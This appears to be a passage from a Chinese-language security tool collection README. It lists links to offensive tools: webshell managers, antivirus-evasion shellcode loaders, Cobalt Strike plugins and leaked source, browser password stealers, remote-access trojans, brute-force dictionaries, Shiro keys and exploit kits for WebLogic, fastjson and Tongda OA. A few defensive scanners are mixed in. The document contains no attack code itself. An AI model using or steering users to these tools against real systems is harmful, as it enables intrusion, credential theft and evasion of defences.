- [TechNet-Gallery-PowerShell武器库](https://github.com/MScholtes/TechNet-Gallery)|[Powershell ebserver:PowerShell实现的Web服务器,无需IIS,支持PowerShell命令执行、脚本执行、上传、下载等功能](https://github.com/MScholtes/TechNet-Gallery/tree/master/Powershell%20Webserver)|[PS2EXE-GUI:将PowerShell脚本转换为EXE文件](https://github.com/MScholtes/TechNet-Gallery/tree/master/PS2EXE-GUI)
- [spybrowse:窃取指定浏览器的配置文件](https://github.com/1d8/spybrowse)
- [FavFreak:执行基于favicon.ico的侦察](https://github.com/devanshbatham/FavFreak)
- [gorailgun_v1.0.7-集漏洞端口扫描利用于一体的工具](./tools/gorailgun_v1.0.7.zip)
- [【shell管理工具】Godzilla-哥斯拉](https://github.com/BeichenDream/Godzilla)|[AntSword-蚁剑](https://github.com/AntSwordProject)|[Behinder-冰蝎](https://github.com/rebeyond/Behinder)
- [由python编写打包的Linux下自动巡检工具](./tools/linux_auto_xunjian)|[源处](https://github.com/heikanet/linux_auto_xunjian)
- [【内网探测】SharpNetCheck-批量检测机器是否有出网权限,可在dnslog中回显内网ip地址和计算机名,可实现内网中的快速定位可出网机器](https://github.com/uknowsec/SharpNetCheck)
- [fofa搜索增强版-使用fofa的url+cookies即可自动下载所有结果](./tools/fofa搜索增强版.zip)
- [SharpBlock-A method of bypassing EDR's active projection DLL's by preventing entry point exection](https://github.com/CCob/SharpBlock)|[相关文章](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/)
- [bypasswaf-云锁数字型注入tamper/安全狗的延时、布尔、union注入绕过tamper](https://github.com/pureqh/bypasswaf)
- [通达OA 2017 版本SQL注入脚本](./tools/tongda_oa_2017_sql_injection.py)
- [t14m4t:一款封装了THC-Hydra和Nmap的自动化爆破工具](https://github.com/MS-WEB-BN/t14m4t)
- [ksubdomain:一款基于无状态子域名爆破工具](https://github.com/knownsec/ksubdomain)
- [smuggler-一款用python3编写的http请求走私验证测试工具](https://github.com/defparam/smuggler)
- [Fuzz_dic:又一个类型全面的参数和字典收集项目](https://github.com/SmithEcon/Fuzz_dic)
- [Fuzzing-Dicts:Web Security Dictionary](https://github.com/3had0w/Fuzzing-Dicts)
- [【爆破字典】自己收集整理的端口、子域、账号密码、其他杂七杂八字典,用于自己使用](https://github.com/cwkiller/Pentest_Dic)
- [【爆破字典】基于实战沉淀下的各种弱口令字典](https://github.com/Mr-xn/SuperWordlist)
- [【爆破字典整合推荐】PentesterSpecialDict-该项目对 [ fuzzDicts | fuzzdb | Dict ] 等其他网上字典开源项目进行整合精简化和去重处理](https://github.com/ppbibo/PentesterSpecialDict)
- [可能是目前最全面的开源模糊测试字典集合了](https://github.com/salmonx/dictionaries)
- [PowerUpSQL:为攻击SQLServer而设计的具有攻击性的PowerShell脚本](https://github.com/NetSPI/PowerUpSQL)|[利用PowerUpSQL攻击SQL Server实例](./books/%E5%88%A9%E7%94%A8PowerUpSQL%E6%94%BB%E5%87%BBSQL%20Server%E5%AE%9E%E4%BE%8B.pdf)
- [adbsploit-一个基于Python3和ADB的安卓设备漏洞利用和管理工具](https://github.com/mesquidar/adbsploit)
- [monsoon-一个用Go语言编写的目录扫描工具,类似于dirsearch](https://github.com/RedTeamPentesting/monsoon)
- [feroxbuster:rust 编写的目录扫描工具](https://github.com/epi052/feroxbuster)
- [【Android脱壳】Youpk-又一款基于ART的主动调用的脱壳机](https://github.com/Youlor/Youpk)
- [【webshell免杀】php免杀D盾webshell生成工具](https://github.com/pureqh/webshell)
- [Steganographer-一款能够帮助你在图片中隐藏文件或数据的Python隐写工具](https://github.com/priyansh-anand/steganographer)
- [AV_Evasion_Tool:掩日 - 免杀执行器生成工具](https://github.com/1y0n/AV_Evasion_Tool)
- [GODNSLOG-河马师傅(河马webshell检测作者)基于go语言开发的一款DNSLOG工具,支持docker一键部署](https://github.com/chennqqi/godnslog)
- [SweetPotato_Cobalt Strike-修改的SweetPotato,使之可以用于CobaltStrike v4.0](https://github.com/Tycx2ry/SweetPotato_CS)
- [ServerScan-一款使用Golang开发的高并发网络扫描、服务探测工具](https://github.com/Adminisme/ServerScan)
- [ShellcodeLoader-将shellcode用rsa加密并动态编译exe,自带几种反沙箱技术](https://github.com/Hzllaga/ShellcodeLoader)
- [shellcodeloader-Windows平台的shellcode免杀加载器](https://github.com/knownsec/shellcodeloader)
- [Go_Bypass:一个golang 编写的免杀生成器模板,目前可以过国内主流杀毒](https://github.com/Arks7/Go_Bypass)
- [FourEye-重明-又一款基于python开发的对shellcode和exe文件免杀的工具](https://github.com/lengjibo/FourEye)
- [Invoke-CustomKatz.ps1-bypass AMSI 的Mimikatz PS脚本](./tools/Invoke-CustomKatz.ps1)-[原文地址](https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/)-[原gits链接](https://gist.github.com/S3cur3Th1sSh1t/b33b978ea62a4b0f6ef545f1378512a6)
- [SimpleShellcodeInjector-shellcode加载器](https://github.com/DimopoulosElias/SimpleShellcodeInjector)
- [Arsenal-Cobalt Strike直接生成payload插件免杀360和火绒](https://github.com/Cliov/Arsenal)
- [ShellCodeFramework-【免杀框架】](https://github.com/mai1zhi2/ShellCodeFramework)
- [cool:Golang Gin 框架写的免杀平台](https://github.com/Ed1s0nZ/cool)
- [abuse-ssl-bypass-waf-使用不同的ssl加密方式来寻找防火墙不支持但服务器支持的加密方式来绕过waf](https://github.com/LandGrey/abuse-ssl-bypass-waf)
- [CrossC2](https://github.com/gloxec/CrossC2)|[CrossC2 framework - 生成CobaltStrike的跨平台beacon](https://github.com/Mr-xn/CrossC2)
- [csbruter-爆破Cobalt Strike的服务端密码](https://github.com/ryanohoro/csbruter)
- [yjdirscan-御剑目录扫描专业版【仅支持windows】](https://github.com/foryujian/yjdirscan)
- [Vmware Vcenter 任意文件读取批量检测](./books/Vmware%20Vcenter%20任意文件读取批量检测.md)
- [CVE-2020-16898检测工具](https://github.com/advanced-threat-research/CVE-2020-16898)
- [Nette框架远程代码执行(CVE-2020-15227)](https://github.com/hu4wufu/CVE-2020-15227)
- [flask-session-cookie-manager-Flask Session Cookie Decoder/Encoder(flask框架的cookie或session编码/解码工具)](https://github.com/noraj/flask-session-cookie-manager)
- [【钓鱼】Mail-Probe-邮箱探针后台管理系统](https://github.com/r00tSe7en/Mail-Probe)
- [momo-code-sec-inspector-java-IDEA静态代码安全审计及漏洞一键修复插件](https://github.com/momosecurity/momo-code-sec-inspector-java)
- [pyrdp-RDP中间人攻击工具](https://github.com/GoSecure/pyrdp)
- [【端口爆破】PortBrute-一款跨平台小巧的端口爆破工具,支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD](https://github.com/awake1t/PortBrute)
- [【端口爆破】x-crack-一款FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令爆破工具](https://github.com/netxfly/x-crack)
- [【威胁日志分析】DeepBlueCLI-通过Windows事件日志来搜寻威胁的powershell模块](https://github.com/sans-blue-team/DeepBlueCLI)
- [Pentest-and-Development-Tips-三好学生大佬出品的有关渗透测试和开发的小技巧](https://github.com/3gstudent/Pentest-and-Development-Tips)
- [【免杀】ImgLoaderShellCode-将shellcode注入bmp图片文件](https://github.com/sv3nbeast/ImgLoaderShellCode)-[配合这个更佳](https://www.svenbeast.com/post/xue-xi-tu-pian-yin-xie-shellcode-jin-xing-yuan-cheng-jia-zai-guo-av/)
- [【免杀】DLL 代理转发与维权](./books/%E3%80%90%E5%85%8D%E6%9D%80%E3%80%91DLL%20%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91%E4%B8%8E%E7%BB%B4%E6%9D%83.pdf)-[原文地址](https://mp.weixin.qq.com/s/zUXrNsf9IsZWocrb7z3i1Q)
- [【免杀】使用nim语言进行shellcode加载](https://github.com/M-Kings/BypassAv-web)
- [【免杀】bypassAV:借助Win-PS2EXE项目编写cna脚本方便快速生成免杀可执行文件](https://github.com/cseroad/bypassAV)
- [【免杀】FuckThatPacker:混淆加密 PowerShell 脚本免杀 Windows defender的 py 脚本工具](https://github.com/Unknow101/FuckThatPacker)
- [LangNetworkTopologys-快速进行内网资产扫描,支持端口扫描,指纹识别,网站探测,结果支持图表展示](https://github.com/LangziFun/LangNetworkTopologys)
- [weblogic_exploit-weblogic漏洞利用工具【包括了weblogic常见高危漏洞的利用】](https://github.com/21superman/weblogic_exploit)
- [rsync_weakpass.py-rsync弱口令爆破脚本](https://github.com/hi-unc1e/some_scripts/blob/master/EXPs/rsync_weakpass.py)
- [Findomain-跨平台的子域名爆破工具](https://github.com/Findomain/Findomain)
- [wfuzz-web应用fuzz工具kali自带工具之一](https://github.com/xmendez/wfuzz)
- [ffuf-基于go开发的快速fuzz工具](https://github.com/ffuf/ffuf)
- [linglong-一款甲方资产巡航扫描系统,系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示](https://github.com/awake1t/linglong)
- [fscan-一键大保健(支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等)](https://github.com/shadow1ng/fscan)
- [anti-honeypot-一款可以检测WEB蜜罐并阻断请求的Chrome插件](https://github.com/cnrstar/anti-honeypot)
- [myscan-又一款被动扫描工具](https://github.com/amcai/myscan)
- [360SafeBrowsergetpass-一键辅助抓取360安全浏览器密码的Cobalt Strike脚本](https://github.com/hayasec/360SafeBrowsergetpass)
- [BrowserView-还原浏览器(支持国产主流浏览器)密码/历史记录/收藏夹/cookie](./tools/BrowserView.exe)-[原地址](http://www.liulanqicode.com/browserview.htm)
- [HackBrowserData-是一个解密浏览器数据(密码|历史记录|Cookie|书签 | 信用卡 | 下载记录)的导出工具,支持全平台主流浏览器](https://github.com/moonD4rk/HackBrowserData)
- [OffensiveNim-简称Nim的跨平台shellcode加载执行器](https://github.com/byt3bl33d3r/OffensiveNim)
- [gshark-GitHub敏感信息扫描收集管理工具](https://github.com/madneal/gshark)
- [domainNamePredictor-一个简单的现代化公司域名使用规律预测及生成工具](https://github.com/LandGrey/domainNamePredictor)
- [r0capture-安卓应用层抓包通杀脚本](https://github.com/r0ysue/r0capture)
- [【免杀】py2exe-将python脚本转换为单文件版可执行的exe文件](https://github.com/py2exe/py2exe)
- [Kunlun-Mirror 专注于安全研究员使用的代码审计辅助工具](https://github.com/LoRexxar/Kunlun-M)
- [JsLoader-js免杀shellcode,绕过杀毒添加自启](https://github.com/Hzllaga/JsLoader)
- [NoMSBuild-MSBuild without MSbuild.exe](https://github.com/rvrsh3ll/NoMSBuild)
- [thinkphp-RCE-POC-Collection-thinkphp v5.x 远程代码执行漏洞-POC集合](https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection)
- [possessor-【过杀软行为检测】原理:在win10下创建一个第二桌面,模拟用户执行命令](https://github.com/gnxbr/Fully-Undetectable-Techniques/tree/main/possessor)
- [MemProcFS-The Memory Process File System](https://github.com/ufrisk/MemProcFS)
- [vulmap-Web漏洞扫描和验证工具,可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描,并且具备漏洞利用功能](https://github.com/zhzyker/vulmap)
- [Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透](https://github.com/TeraSecTeam/ary)
- [AKtools-Java版的aliyun-accesskey-Tools](https://github.com/Moon3r/AKtools)|[aliyun-accesskey-Tools-此工具用于查询ALIYUN_ACCESSKEY的主机,并且远程执行命令](https://github.com/mrknow001/aliyun-accesskey-Tools)|[alicloud-tools:阿里云ECS、策略组辅助小工具](https://github.com/iiiusky/alicloud-tools)
- [MDAT-一款用于数据库攻击的利用工具,集合了多种主流的数据库类型](https://github.com/SafeGroceryStore/MDAT)
- [sqlmap-gtk-sqlmap的GUI界面实现](https://github.com/needle-wang/sqlmap-gtk)
- [Viper-msf(metasploit-framework)图形界面](https://github.com/FunnyWolf/Viper)
- [Web-Fuzzing-Box - Web 模糊测试字典与一些Payloads,主要包含:弱口令暴力破解、目录以及文件枚举、Web漏洞](https://github.com/gh0stkey/Web-Fuzzing-Box)
- [emp3r0r-Linux后渗透框架](https://github.com/jm33-m0/emp3r0r)
- [dnstunnel-一款多会话的二进制DNS隧道远控](https://github.com/bigBestWay/dnstunnel)
- [CVE-2020-17519-Apache Flink 目录遍历漏洞批量检测](https://github.com/B1anda0/CVE-2020-17519)
- [Internal-Monologue-通过 SSPI 调⽤ NTLM 身份验证,通过协商使⽤预定义 challenge 降级为 NetNTLMv1,获取到 NetNTLMv1 hash](https://github.com/eladshamir/Internal-Monologue)
- [domainTools-内网域渗透小工具](https://github.com/SkewwG/domainTools)
- [HackTools(如当)-红队浏览器插件](https://github.com/s7ckTeam/HackTools)
- [CVE-2020-36179-Jackson-databind SSRF&RCE](https://github.com/Al1ex/CVE-2020-36179)
- [leaky-paths-一份有关major web CVEs, known juicy APIs, misconfigurations这类的特别应用路径字典收集](https://github.com/ayoubfathi/leaky-paths)
- [QuJing(曲境)-曲境是一个xposed模块,可实现在PC浏览器上动态监控(hook)函数调用和查看堆栈信息,及反射调用(invoke)等功能](https://github.com/Mocha-L/QuJing)
- [r0tracer-安卓Java层多功能追踪脚本](https://github.com/r0ysue/r0tracer)
- [TFirewall-防火墙出网探测工具,内网穿透型socks5代理](https://github.com/FunnyWolf/TFirewall)
- [`Cooolis-ms`是一个包含了Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injection的代码执行工具,它的定位在于能够在静态查杀上规避一些我们将要执行且含有特征的代码,帮助红队人员更方便快捷的从Web容器环境切换到C2环境进一步进行工作。](https://github.com/Rvn0xsy/Cooolis-ms)
- [GScan-为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源](https://github.com/grayddq/GScan)
- [Kscan-一款轻量级的资产发现工具,可针对IP/IP段或资产列表进行端口扫描以及TCP指纹识别和Banner抓取,在不发送更多的数据包的情况下尽可能的获取端口更多信息](https://github.com/lcvvvv/kscan)
- [【字典】Dictionary-Of-Pentesting-认证类、文件路径类、端口类、域名类、无线类、正则类](https://github.com/insightglacier/Dictionary-Of-Pentesting)
- [【免杀框架】*Veil*-Evasion是一个用python写的*免杀*框架](https://github.com/Veil-Framework/Veil)
- [Shellcoding-shellcode生成+shellcode混淆](https://github.com/Mr-Un1k0d3r/Shellcoding)
- [【免杀】bypassAV-条件触发式远控](https://github.com/pureqh/bypassAV)
- [SystemToken-通过遍历所有进程来寻找一个以SYSTEM权限运行且所有者为 Administrators的进程后,以当前token新启一个SYSTEM权限的shell](https://github.com/yusufqk/SystemToken)
- [通达OA综合利用工具_圈子社区专版](./tools/通达OA综合利用工具_圈子社区专版.jar)
- [IoT-vulhub-IoT 固件漏洞复现环境](https://github.com/firmianay/IoT-vulhub)
- [RedisWriteFile-通过 Redis 主从写出无损文件](https://github.com/r35tart/RedisWriteFile)
- [AWVS-13-SCAN-PLUS_一个基于Acunetix Web Vulnerability Scanner 13 (AWVS13)扫描引擎的辅助软件](https://github.com/x364e3ab6/AWVS-13-SCAN-PLUS)
- [sonar-java_java代码质量检查和安全性测试](https://github.com/SonarSource/sonar-java)
- [CSS-Exchange_微软自家出品的Exchange server检查工具](https://github.com/microsoft/CSS-Exchange)
- [frpModify-修改frp支持域前置与配置文件自删除](https://github.com/uknowsec/frpModify)|[FrpProPlugin-frp0.33修改版,过流量检测,免杀,支持加载远程配置文件可用于cs直接使用的插件](https://github.com/mstxq17/FrpProPlugin)
- [Erfrp:Erfrp-frp二开-免杀与隐藏](https://github.com/Goqi/Erfrp)
- [Vulfocus-一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用](https://github.com/fofapro/vulfocus)
- [vulnReport-安服自动化脚本:包括 Nessus、天境主机漏洞扫描6.0、APPscan、awvs等漏洞报告的整理,Google翻译等](https://github.com/wysec2020/vulnReport)
- [.NETWebShell-动态编译实现任意命令执行,Windows Defender 免杀](https://github.com/Ivan1ee/.NETWebShell)
- [NetDLLSpy-.NET后渗透下的权限维持,附下载DLL](https://github.com/Ivan1ee/NetDLLSpy)
- [DuckMemoryScan-一个简单寻找包括不限于iis劫持,无文件木马,shellcode免杀后门的工具](https://github.com/huoji120/DuckMemoryScan)
- [PocList-jar单文件版的各种poc利用工具](https://github.com/Yang0615777/PocList)
- [swagger-hack:自动化爬取并自动测试所有swagger-ui.html显示的接口](https://github.com/jayus0821/swagger-hack)|[Swagger API Exploit-一个 Swagger REST API 信息泄露利用工具](https://github.com/lijiejie/swagger-exp)
- [weblogic-framework:weblogic漏洞检测框架](https://github.com/0nise/weblogic-framework)
- [Finger-web指纹识别工具『质量根据规则库』](https://github.com/EASY233/Finger)
- [Sunflower_get_Password-一款针对向日葵的识别码和验证码提取工具](https://github.com/wafinfo/Sunflower_get_Password)
- [LaZagne:一键抓取目标机器上的所有明文密码(有点类似于mimikatz)](https://github.com/AlessandroZ/LaZagne)
- [gitrecon-从gitlab或者github的提交记录和个人主页提取个人信息,如邮箱、公司、地址、twitter、blog等等](https://github.com/GONZOsint/gitrecon)
- [SharpClipboard:用c#写的获取剪贴板内容的工具,也可用于cobalt strike中使用](https://github.com/slyd0g/SharpClipboard)
- [Limelighter-应用程序伪造签名](https://github.com/Tylous/Limelighter)
- [aLIEz-java杀内存马工具](https://github.com/r00t4dm/aLIEz)
- [weblogic_memshell-适用于weblogic的无shell的内存马](https://github.com/keven1z/weblogic_memshell)
- [FofaSpider-Fofa爬虫支持高级查询语句批量爬取](https://github.com/KpLi0rn/FofaSpider)
- [SpringBoot 持久化 WebShell](https://github.com/threedr3am/ZhouYu)
- [nuclei引擎的exp库](https://github.com/projectdiscovery/nuclei-templates)
- [smarGate-内网穿透,c++实现,无需公网IP,小巧,易用,快速,安全,最好的多链路聚合(p2p+proxy)模式](https://github.com/lazy-luo/smarGate)
- [200个shiro key 来自lscteam的分享](./shiro_keys_200.txt)
- [shiro-exploit-Shiro反序列化利用工具,支持新版本(AES-GCM)Shiro的key爆破,配合ysoserial,生成回显Payload](https://github.com/Ares-X/shiro-exploit)|[备份下载](./tools/shiro_tool.zip)
- [fastjson_rce_tool-fastjson命令执行自动化利用工具, remote code execute,JNDI服务利用工具 RMI/LDAP](https://github.com/wyzxxz/fastjson_rce_tool)|[备份下载](./tools/fastjson_tool.jar)
- [Eeyes(棱眼)-快速筛选真实IP并整理为C段](https://github.com/EdgeSecurityTeam/Eeyes)
- [EHole(棱洞)2.0 重构版-红队重点攻击系统指纹探测工具](https://github.com/EdgeSecurityTeam/EHole)
- [ListRDPConnections-C# 读取本机对外RDP连接记录和其他主机对该主机的连接记录,从而在内网渗透中获取更多可通内网网段信息以及定位运维管理人员主机](https://github.com/Heart-Sky/ListRDPConnections)
- [PandaSniper-熊猫狙击手的Linux C2框架demo](https://github.com/QAX-A-Team/PandaSniper)
- [CaptfEncoder是一款可扩展跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、非对称加密、特殊编码、杂项等工具,并聚合各类在线工具](https://github.com/guyoung/CaptfEncoder)
- [Evasor - 自动化查找可执行文件的安全评估工具](https://github.com/cyberark/Evasor)
- [jenkins-attack-framework-Jenkins攻击框架](https://github.com/Accenture/jenkins-attack-framework)
- [MicroBackdoor-适用于Windows目标的小型便捷C2工具](https://github.com/Cr4sh/MicroBackdoor)
- [puredns-子域爆破工具](https://github.com/d3mondev/puredns)
- [dnsub:子域名扫描工具](https://github.com/yunxu1/dnsub)
- [DcRat-C#编写的简易远控工具](https://github.com/qwqdanchun/DcRat)
- [PhishingLnk-windows钓鱼快捷方式link生成工具](https://github.com/qwqdanchun/PhishingLnk)
- [paragon-Red Team互动平台,旨在统一简单UI后的进攻工具](https://github.com/KCarretto/paragon)
- [vaf-非常先进的Web Fuzzer工具](https://github.com/d4rckh/vaf)
- [nginxpwner-寻找常见Nginx错误配置和漏洞的简单工具](https://github.com/stark0de/nginxpwner)
- [pentest_lab:使用docker-compose搭建常见的几种靶机系统](https://github.com/oliverwiegers/pentest_lab)
- [SharpWebServer:搭建HTTP和WebDAV服务器来捕获Net-NTLM哈希](https://github.com/mgeeky/SharpWebServer)
- [interactsh:用于带外数据提取的开源解决方案,一种用于检测导致外部交互的错误的工具,例如:Blind SQLi,Blind CMDi,SSRF等](https://github.com/projectdiscovery/interactsh)
- [Autoscanner-一款自动化扫描器,其功能主要是遍历所有子域名、及遍历主机所有端口寻找出所有http服务,并使用集成的工具(oneforall、masscan、nmap、crawlergo、dirsearch、xray、awvs、whatweb等)进行扫描,最后集成扫描报告](https://github.com/zongdeiqianxing/Autoscanner)
- [Z1-AggressorScripts:适用于Cobalt Strike 3.x & 4.x 的插件](https://github.com/z1un/Z1-AggressorScripts)
- [TongdaOA-通达OA 11.7 任意用户登录](https://github.com/z1un/TongdaOA)
- [charlotte:又一款免杀 C++ Shellcode加载器](https://github.com/9emin1/charlotte)
- [Bytecode Viewer是一个高级的轻量级Java字节码查看器](https://github.com/Konloch/bytecode-viewer)
- [go-crack:go 语言写的弱口令爆破工具](https://github.com/niudaii/go-crack)
- [Metarget-一个脆弱基础设施自动化构建框架,主要用于快速、自动化搭建从简单到复杂的脆弱云原生靶机环境](https://github.com/brant-ruan/metarget)
- [NessusToReport-nessus扫描报告自动化生成工具](https://github.com/Hypdncy/NessusToReport)
- [cloudflare-bypass:使用Cloudflare Workers来绕过Cloudflare 的机器人验证](https://github.com/jychp/cloudflare-bypass)
- [安全测试工具集:在学习和渗透测试过程中自己写的一些小脚本、小工具和一些常用字典、木马](https://github.com/echohun/tools)
- [php_code_analysis:python编写的代码审计脚本(关键词匹配,类似于seay代码审计)](https://github.com/kira2040k/php_code_analysis)
- [schemeflood:基于Schemeflood技术实现对已安装的软件进行探测](https://github.com/TomAPU/schemeflood)
- [pocscan:指纹识别后,进行漏洞精准扫描](https://github.com/DSO-Lab/pocscan)
- [DNSLog-Platform-Golang:一键搭建Dnslog平台的golang版本](https://github.com/yumusb/DNSLog-Platform-Golang)
- [WinAPI-Tricks:恶意软件使用或滥用的各种 WINAPI 技巧/功能的集合](https://github.com/vxunderground/WinAPI-Tricks)
- [go_meterpreter:Golang实现的x86下的Meterpreter reverse tcp](https://github.com/insightglacier/go_meterpreter)
- [sharpwmi:一个基于rpc的横向移动工具,具有上传文件和执行命令功能](https://github.com/QAX-A-Team/sharpwmi)
- [RedWarden:灵活的配置C2反向代理来隐藏自己的CS](https://github.com/mgeeky/RedWarden)
- [MemoryShellLearn:java内存马的学习记录以及demo](https://github.com/bitterzzZZ/MemoryShellLearn)
- [图形化漏洞利用Demo-JavaFX版:ExpDemo-JavaFX ](https://github.com/yhy0/ExpDemo-JavaFX)
- [Security_Product:开源安全产品源码](https://github.com/birdhan/Security_Product)
- [flask_memory_shell:Flask 内存马](https://github.com/iceyhexman/flask_memory_shell)
- [SourceDetector:用于发现源码文件(*.map)的chrome插件](https://github.com/SunHuawei/SourceDetector)
- [CrossNet-Beta:红队行动中利用白利用、免杀、自动判断网络环境生成钓鱼可执行文件](https://github.com/dr0op/CrossNet-Beta)
- [slopShell:一款功能强大的PHP Webshell](https://github.com/oldkingcone/slopShell)
- [rustcat:netcat的代替品](https://github.com/robiot/rustcat)
- [Backstab:通过加载恶意的驱动文件干掉杀软](https://github.com/Yaxser/Backstab)
- [ncDecode:用友nc数据库密码解密工具](https://github.com/jas502n/ncDecode)
- [JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具](https://github.com/Threezh1/JSFinder)|[JSFinder的油猴脚本版本](https://github.com/Threezh1/Deconstruct/tree/main/DevTools_JSFinder)
- [Packer-Fuzzer:一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具](https://github.com/rtcatc/Packer-Fuzzer)
- [post-hub:内网仓库:远控、提权、免杀、代理、横向、清理](https://github.com/ybdt/post-hub)
- [FridaHooker:Android 图形化Frida管理器](https://github.com/wrlu/FridaHooker)
- [firefox浏览器密码dump工具之.net版](https://github.com/gourk/FirePwd.Net)|[firepwd:firefox密码dump解密工具python版](https://github.com/lclevy/firepwd)|[FireFox-Thief:又一个解密firefox浏览器密码的工具-windows版本](https://github.com/LimerBoy/FireFox-Thief)|[chrome>80的密码解密提取工具-windows版本](https://github.com/LimerBoy/Adamantium-Thief)
- [Noah-golang版本的批量高速获取单IP 或 C段 title 工具『可指定端口和线程,支持文本批量的单IP或IP段』](https://github.com/ody5sey/Noah)
- [bmc-tools:从RDP连接的缓存文件中还原图片](https://github.com/ANSSI-FR/bmc-tools)|[RdpCacheStitcher:协助拼图还原RDP缓存图像的工具,和前面的是好搭档](https://github.com/BSI-Bund/RdpCacheStitcher)
- [phpshell:php大马|php一句话](https://github.com/weepsafe/phpshell)
- [goShellCodeByPassVT:通过线程注入及-race参数免杀全部VT](https://github.com/fcre1938/goShellCodeByPassVT)
- [NGLite-基于区块链网络的匿名跨平台远控程序](https://github.com/Maka8ka/NGLite)-[相关文章](./books/NGLite-基于区块链网络的匿名跨平台远控程序%20_%20Maka8ka's%20Garden.pdf)
- [SocksOverRDP:通过RDP连接开一个socks代理](https://github.com/nccgroup/SocksOverRDP)-[SharpRDP:通过RDP执行命令](https://github.com/0xthirteen/SharpRDP)-[rdpcmd:通过RDP执行命令](https://github.com/kost/rdpcmd)
- [wpscvn:供渗透测试人员、网站所有者测试他们的网站是否有一些易受攻击的插件或主题的工具](https://github.com/sabersebri/wpscvn)
- [xjar:Spring Boot JAR 安全加密运行工具,支持的原生JAR](https://github.com/core-lib/xjar)
- [process_ghosting:Windows上通过篡改内存中的可执行文件映射达到绕过杀软的行为查杀](https://github.com/hasherezade/process_ghosting)
- [kali-whoami: 隐私工具, 旨在让您在 Kali Linux 上保持最高级别的匿名性](https://github.com/omer-dogan/kali-whoami)
- [goon:一款基于golang开发的扫描及爆破工具](https://github.com/i11us0ry/goon)
- [OXID:通过windows的DCOM接口进行网卡进行信息枚举,无需认证,只要目标的135端口开放即可获得信息](https://github.com/canc3s/OXID)
- [gnc:golang 版本的 nc ,支持平时使用的大部分功能,并增加了流量rc4加密](https://github.com/canc3s/gnc)
- [post-attack:内网渗透:远控、免杀、代理、横向,专注于打点后的内网渗透中涉及到的各类技术](https://github.com/ybdt/post-attack)
- [jndiat:专为测试Weblogic T3协议安全的工具](https://github.com/quentinhardy/jndiat)
- [RabR:Redis-Attack By Replication (通过主从复制攻击Redis)](https://github.com/0671/RabR)
- [hysteria:恶劣网络环境下的双边加速工具](https://github.com/HyNetwork/hysteria)
- [Cobaltstrike_4.3源码](https://github.com/nice0e3/Cobaltstrike_4.3_Source)
- [Beaconator:CS becaon 生成](https://github.com/capt-meelo/Beaconator)
- [MicrosoftWontFixList-微软的设计缺陷导致的提权漏洞列表](https://github.com/cfalta/MicrosoftWontFixList)
- [unfuck: Python 2.7 字节码反混淆器](https://github.com/landaire/unfuck)
- [Mimikore: .NET 5 单文件应用程序. Mimikatz 或任何 Base64 PE 加载程序](https://github.com/secdev-01/Mimikore)
- [kinject: 内核Shellcode注入器](https://github.com/w1u0u1/kinject)
- [Tiny-XSS-Payloads:超级精简的XSS payload](https://github.com/terjanq/Tiny-XSS-Payloads)
- [domhttpx:用python开发的 google搜索 工具](https://github.com/naufalardhani/domhttpx)
- [NSE-scripts:nmap检测脚本(CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473)](https://github.com/psc4re/NSE-scripts)
- [vscan:开源、轻量、快速、跨平台 的红队(redteam)外网打点扫描器,功能 端口扫描(port scan) 指纹识别(fingerprint) nday检测(nday check) 智能爆破 (admin brute) 敏感文件扫描(file fuzz)](https://github.com/veo/vscan)
- [evilzip:制作恶意的zip压缩包工具](https://github.com/TheKingOfDuck/evilzip)
- [oFx-漏洞批量扫描框架,0Day/1Day全网概念验证](https://github.com/bigblackhat/oFx)
- [shiro rememberMe 在线加解密工具](https://github.com/M-Kings/WEB-shiro_rememberMe_encode_decode)
- [tp_scan:thinkphp 一键化扫描工具 优化版](https://github.com/cqkenuo/tp_scan)
- [apitool:Windows Api调用【添加用户,添加用户到组,更改用户密码,删除用户,列出计算机上所有用户,列出计算机上所有组】](https://github.com/M-Kings/apitool)
- [spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks)
- [Frog-Fp:批量深度指纹识别框架](https://github.com/timwhitez/Frog-Fp)
- [AlliN:python单文件,无依赖的快速打点的综合工具](https://github.com/P1-Team/AlliN)
- [Troy:更高级的免杀webshell生成工具](https://github.com/pureqh/Troy)
- [aksk_tool:AK利用工具,阿里云/腾讯云 AccessKey AccessKeySecret,利用AK获取资源信息和操作资源,ECS/CVM操作,OSS/COS管理,RDS管理,域名管理,添加RAM账号等](https://github.com/wyzxxz/aksk_tool)-[备份下载](./tools/aksk_tool.zip)
- [heapdump_tool:heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等](https://github.com/wyzxxz/heapdump_tool)-[备份下载](./tools/heapdump_tool.jar)
- [ShuiZe_0x727:水泽-信息收集自动化工具](https://github.com/0x727/ShuiZe_0x727)
- [SharpBeacon:CobaltStrike Beacon written in .Net 4 用.net重写了stager及Beacon,其中包括正常上线、文件管理、进程管理、令牌管理、结合SysCall进行注入、原生端口转发、关ETW等一系列功能](https://github.com/mai1zhi2/SharpBeacon)
- [RocB:Java代码审计IDEA插件 SAST](https://github.com/XianYanTechnology/RocB)
- [sx:快速易用的现代化网络扫描工具](https://github.com/v-byte-cpu/sx)
